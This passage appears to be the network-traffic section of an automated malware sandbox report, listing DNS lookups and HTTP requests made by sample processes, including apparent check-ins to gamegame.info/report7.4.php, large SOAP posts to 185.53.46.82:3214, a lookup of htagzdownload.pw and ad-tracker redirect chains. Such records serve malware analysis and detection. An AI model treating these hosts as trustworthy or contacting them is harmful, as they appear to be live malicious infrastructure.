                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:12 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SWY1BNFntV9YCB5HkXHtYPP71vS3K7RBPE1s0kqeamJ0wAQ1%2FiH8zlDR%2BA4gANML2dES2Hn%2BOHoLd0ayBqESDwOzmZHdhvcujyoNs%2B9J3Jypx7Ze28qlHXI%2Bq90UlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5321a09f7011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=655yYNJ%2FuyOnZ8YzijNK%2F6rteNiUqNhjJK7wJZT9gvl%2BQiTTflR4i04Hdu%2BaT1HuE%2FstP7GQfMJFCLxdMkE9uqIqwZspsfmErN%2B4RpDb%2BAOG8s6VNO3otOtDIjelmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c532265918011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 250
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8OJAjo21THl%2F8Hnmfx8XdmevX3XWx%2Btwsex2rxYKh55dmliAEWCdrGpVzXQa4r6GSPH02vE0TcrIf0mlnEAp5gQEpEYZ6xao0CUDN%2FkwYViDmt78%2Bk45sB%2BvJVsKug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5322aeee9011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • DNS
                                                                                          venetrigni.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          Response
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          52.20.18.214
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          54.227.178.166
                                                                                        • GET
                                                                                          https://venetrigni.com/stats
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          52.20.18.214:443
                                                                                          Request
                                                                                          GET /stats HTTP/2.0
                                                                                          host: venetrigni.com
                                                                                          accept: */*
                                                                                          origin: https://www.profitabletrustednetwork.com
                                                                                          referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          content-length: 40
                                                                                          server: fasthttp
                                                                                          access-control-allow-origin: https://www.profitabletrustednetwork.com
                                                                                          access-control-allow-credentials: true
                                                                                          set-cookie: uid_id2=66ff1445-9781-4605-8aca-a61e6e9c1ef5:1:1; expires=Mon, 07 Jul 2031 23:05:15 GMT; secure; SameSite=None
                                                                                        • POST
                                                                                          http://185.53.46.82:3214/
                                                                                          1D88.exe
                                                                                          Remote address:
                                                                                          185.53.46.82:3214
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                          Host: 185.53.46.82:3214
                                                                                          Content-Length: 37256871
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 150
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:17 GMT
                                                                                        • POST
                                                                                          http://185.53.46.82:3214/
                                                                                          1D88.exe
                                                                                          Remote address:
                                                                                          185.53.46.82:3214
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 185.53.46.82:3214
                                                                                          Content-Length: 37256857
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:21 GMT
                                                                                        • GET
                                                                                          https://www.profitabletrustednetwork.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          content-type: image/x-icon
                                                                                          content-length: 0
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: cddadc715f82986696573165788fc95e
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • DNS
                                                                                          ol.gamegame.info
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          Response
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          104.21.21.221
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          172.67.200.215
                                                                                        • POST
                                                                                          http://ol.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ol.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=w7fWV5XU%2FF8%2Fw%2BO%2B7JWLAM67YEElplJ0ChM9VyRZVidKjo6TVFOLuRAaSI0UUm4F1eU0QPreK0Q6RQow9m4tWGgAoZBRebxv6sfd%2B4Wmhsjar4ef6cBDjb%2F600BprA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5322059b44be9-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • DNS
                                                                                          trk.lemon-ade.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          trk.lemon-ade.site
                                                                                          IN A
                                                                                          Response
                                                                                          trk.lemon-ade.site
                                                                                          IN CNAME
                                                                                          uvg0u.bemobtracks.com
                                                                                          uvg0u.bemobtracks.com
                                                                                          IN A
                                                                                          3.210.231.22
                                                                                          uvg0u.bemobtracks.com
                                                                                          IN A
                                                                                          54.210.38.13
                                                                                        • GET
                                                                                          https://trk.lemon-ade.site/go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          3.210.231.22:443
                                                                                          Request
                                                                                          GET /go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: trk.lemon-ade.site
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Set-Cookie: bemob-uniq-visit:9f5655c8-33b8-4e91-aa0b-2e057393cf74=1; Domain=trk.lemon-ade.site; Path=/; Expires=Sat, 10 Jul 2021 23:05:14 GMT; HttpOnly; Secure; SameSite=None
                                                                                          Set-Cookie: bemob-click-id=4pSJha3F1KRcn6wpv7yLuR; Domain=trk.lemon-ade.site; Path=/; Expires=Sat, 10 Jul 2021 23:05:14 GMT; HttpOnly; Secure; SameSite=None
                                                                                          ETag: W/"123-qyikHV+voKx324W6bqPnUDXXWLg"
                                                                                          X-Response-Time: 9.043ms
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Cache-Control: no-cache
                                                                                          Strict-Transport-Security: max-age=0; includeSubDomains
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://x1.c.lencr.org/
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          104.73.131.204:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: x1.c.lencr.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Content-Type: application/pkix-crl
                                                                                          Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
                                                                                          ETag: "5f518b98-2cd"
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Sat, 10 Jul 2021 00:05:14 GMT
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Length: 717
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          afflat3d1.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          afflat3d1.com
                                                                                          IN A
                                                                                          Response
                                                                                          afflat3d1.com
                                                                                          IN A
                                                                                          69.172.200.185
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://afflat3d1.com/lnk.asp?o=21072&c=918277&a=491407&k=4021AFAD236A78C07FA6ADBA14948471&l=22139&s1=4969ebaf&s2=4pSJha3F1KRcn6wpv7yLuR&s2=4pSJha3F1KRcn6wpv7yLuR
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          69.172.200.185:443
                                                                                          Request
                                                                                          GET /lnk.asp?o=21072&c=918277&a=491407&k=4021AFAD236A78C07FA6ADBA14948471&l=22139&s1=4969ebaf&s2=4pSJha3F1KRcn6wpv7yLuR&s2=4pSJha3F1KRcn6wpv7yLuR HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: afflat3d1.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Object moved
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 200
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=20
                                                                                          Cache-Control: private
                                                                                          Location: https://kodim.rdtk.io/6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125
                                                                                          Set-Cookie: mb_21072_SS=AF=491407&AC=716898125&CS=717389532; path=/; SameSite=none; Expires=Tue, 7 Sep 2021 19:5:16 GMT<br />; Secure
                                                                                          Set-Cookie: I_SS=716898125; path=/; SameSite=none; Expires=Mon, 7 Jul 2031 19:5:16 GMT<br />; Secure
                                                                                          Set-Cookie: I=716898125; expires=Mon, 07-Jul-2031 04:00:00 GMT; path=/
                                                                                          Set-Cookie: mb%5F21072=AC=716898125&CS=717389532&AF=491407; expires=Tue, 07-Sep-2021 04:00:00 GMT; path=/
                                                                                          Set-Cookie: ASPSESSIONIDSWSBTCCB=MNOHBCGAGKCJICNKCFMIHABL; secure; path=/
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-DIS-Request-ID: 6f20d23f2e756a25d1c773a7dd8f95cd
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://trk.lemon-ade.site/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          3.210.231.22:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: trk.lemon-ade.site
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iceanedy.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          Response
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          172.67.214.126
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          104.21.86.39
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          kodim.rdtk.io
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          kodim.rdtk.io
                                                                                          IN A
                                                                                          Response
                                                                                          kodim.rdtk.io
                                                                                          IN CNAME
                                                                                          rdtk.io
                                                                                          rdtk.io
                                                                                          IN A
                                                                                          23.105.36.164
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://kodim.rdtk.io/6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          23.105.36.164:443
                                                                                          Request
                                                                                          GET /6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: kodim.rdtk.io
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx/1.19.9
                                                                                          Date: Fri, 09 Jul 2021 23:05:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 54
                                                                                          Connection: keep-alive
                                                                                          Location: https://www.utopia-network.org/
                                                                                          Set-Cookie: redhash=NjBlOGQ2MzJmOTJjYTAwMDAxNDZlNjJlfDB8NjA5NDQ1OTc3NmZmMWIwMDAxZWRiZTdkfHwxMzJiMGM1OC1lNTc5LTRhMWQtYjYyOC01ZDY4NzQyNDk4ZWJ8MTYyNTg3MTkyMg==; Path=/; Domain=kodim.rdtk.io; Expires=Sat, 09 Jul 2022 23:05:22 GMT; SameSite=None; Secure
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.utopia-network.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.utopia-network.org
                                                                                          IN A
                                                                                          Response
                                                                                          www.utopia-network.org
                                                                                          IN CNAME
                                                                                          utopia-network.org
                                                                                          utopia-network.org
                                                                                          IN A
                                                                                          162.0.209.78
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET / HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 25 May 2021 15:29:42 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 11036
                                                                                          content-type: text/html
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/css/styles.min.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /css/styles.min.css HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 563
                                                                                          content-type: text/css
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/css/social-links.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /css/social-links.css HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 04 May 2021 10:41:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 26749
                                                                                          content-type: text/css
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/logo.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/logo.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 2107
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/sidebar__bg_right.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/sidebar__bg_right.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 71387
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/close.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/close.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 188
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/download.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/download.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
